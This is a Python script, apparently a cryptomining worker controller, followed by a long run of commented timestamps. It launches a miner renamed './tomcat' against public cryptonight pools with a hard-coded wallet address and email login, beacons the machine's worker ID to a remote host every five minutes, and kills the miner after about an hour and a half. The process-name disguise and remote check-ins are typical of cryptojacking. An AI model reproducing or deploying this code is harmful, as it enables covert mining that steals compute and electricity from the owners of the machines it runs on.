import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:14:05.269197
#2018-02-17 17:02:08.289019
#2018-02-17 18:51:05.261910
#2018-02-17 20:40:08.236988
#2018-02-17 22:27:04.445017
#2018-02-18 00:10:06.102758
#2018-02-18 02:02:06.195993
#2018-02-18 03:48:03.631863
#2018-02-18 05:35:07.032875
#2018-02-18 07:28:06.648838
#2018-02-18 09:16:03.782630
#2018-02-18 11:02:01.567811
#2018-02-18 12:48:07.336700
#2018-02-18 14:34:05.387478
#2018-02-18 16:24:05.714171
#2018-02-18 18:13:07.067676
#2018-02-18 19:58:04.898766
#2018-02-18 21:45:01.414273
#2018-02-18 23:34:01.379215
#2018-02-19 01:20:01.711696
#2018-02-19 03:09:01.842031
#2018-02-19 04:54:03.846526
#2018-02-19 06:38:05.615896
#2018-02-19 08:28:07.154254
#2018-02-19 10:17:08.744467
#2018-02-19 12:05:08.919524
#2018-02-19 13:52:06.890064
#2018-02-19 15:40:11.302375
#2018-02-19 17:27:07.788665
#2018-02-19 19:15:02.288064
#2018-02-19 21:03:07.820028
#2018-02-19 22:49:07.596430
#2018-02-20 00:34:03.650608
#2018-02-20 02:22:06.860334
#2018-02-20 04:12:08.006617
#2018-02-20 05:55:06.343397
#2018-02-20 07:41:04.280113
#2018-02-20 09:25:01.495252
#2018-02-20 11:09:08.257578
#2018-02-20 12:56:01.482558
#2018-02-20 14:41:01.301411
#2018-02-20 16:27:01.864375
#2018-02-20 18:13:08.184957
#2018-02-20 20:06:06.370933
#2018-02-20 21:52:07.318964
#2018-02-20 23:33:01.991975
#2018-02-21 01:19:06.155612
#2018-02-21 03:06:07.804827
#2018-02-21 04:54:07.340146
#2018-02-21 06:43:01.519302
#2018-02-21 08:31:01.834789
#2018-02-21 10:16:06.870035
#2018-02-21 12:04:06.041237
#2018-02-21 13:53:06.075076
#2018-02-21 15:36:07.815323
#2018-02-21 17:28:06.600512
#2018-02-21 19:15:04.096100
#2018-02-21 21:03:07.966318
#2018-02-21 22:51:08.191218
#2018-02-22 00:40:10.233823
#2018-02-22 02:28:05.900128
#2018-02-22 04:16:01.284318
#2018-02-22 06:01:05.094821
#2018-02-22 07:46:08.761094
#2018-02-22 09:33:05.067168
#2018-02-22 11:19:06.691366
#2018-02-22 13:05:03.619291
#2018-02-22 14:52:08.771031
#2018-02-22 16:39:05.723503
#2018-02-22 18:25:04.212459
#2018-02-22 20:18:01.478957
#2018-02-22 22:04:03.962710
#2018-02-22 23:50:08.301252
#2018-02-23 01:39:05.472233
#2018-02-23 03:26:07.706390
#2018-02-23 05:13:05.760222
#2018-02-23 06:57:01.472641
#2018-02-23 08:46:06.858208
#2018-02-23 11:03:04.263843
#2018-02-23 12:59:08.102558
#2018-02-23 14:45:09.028724
#2018-02-23 16:35:01.283853
#2018-02-23 18:22:01.817610
#2018-02-23 20:08:04.677200
#2018-02-23 21:57:07.787136
#2018-02-23 23:46:04.803540
#2018-02-24 01:39:01.807910
#2018-02-24 03:31:05.967956
#2018-02-24 05:16:07.733092
#2018-02-24 07:05:07.178315
#2018-02-24 08:52:06.072453
#2018-02-24 10:54:04.836746
#2018-02-24 12:42:05.712639
#2018-02-24 14:34:05.244720
#2018-02-24 16:20:08.009299
#2018-02-24 18:14:04.610072
#2018-02-24 20:01:04.195354
#2018-02-24 21:44:03.869832
#2018-02-25 02:02:01.700378
#2018-02-25 05:57:07.306037
#2018-02-25 11:38:06.533203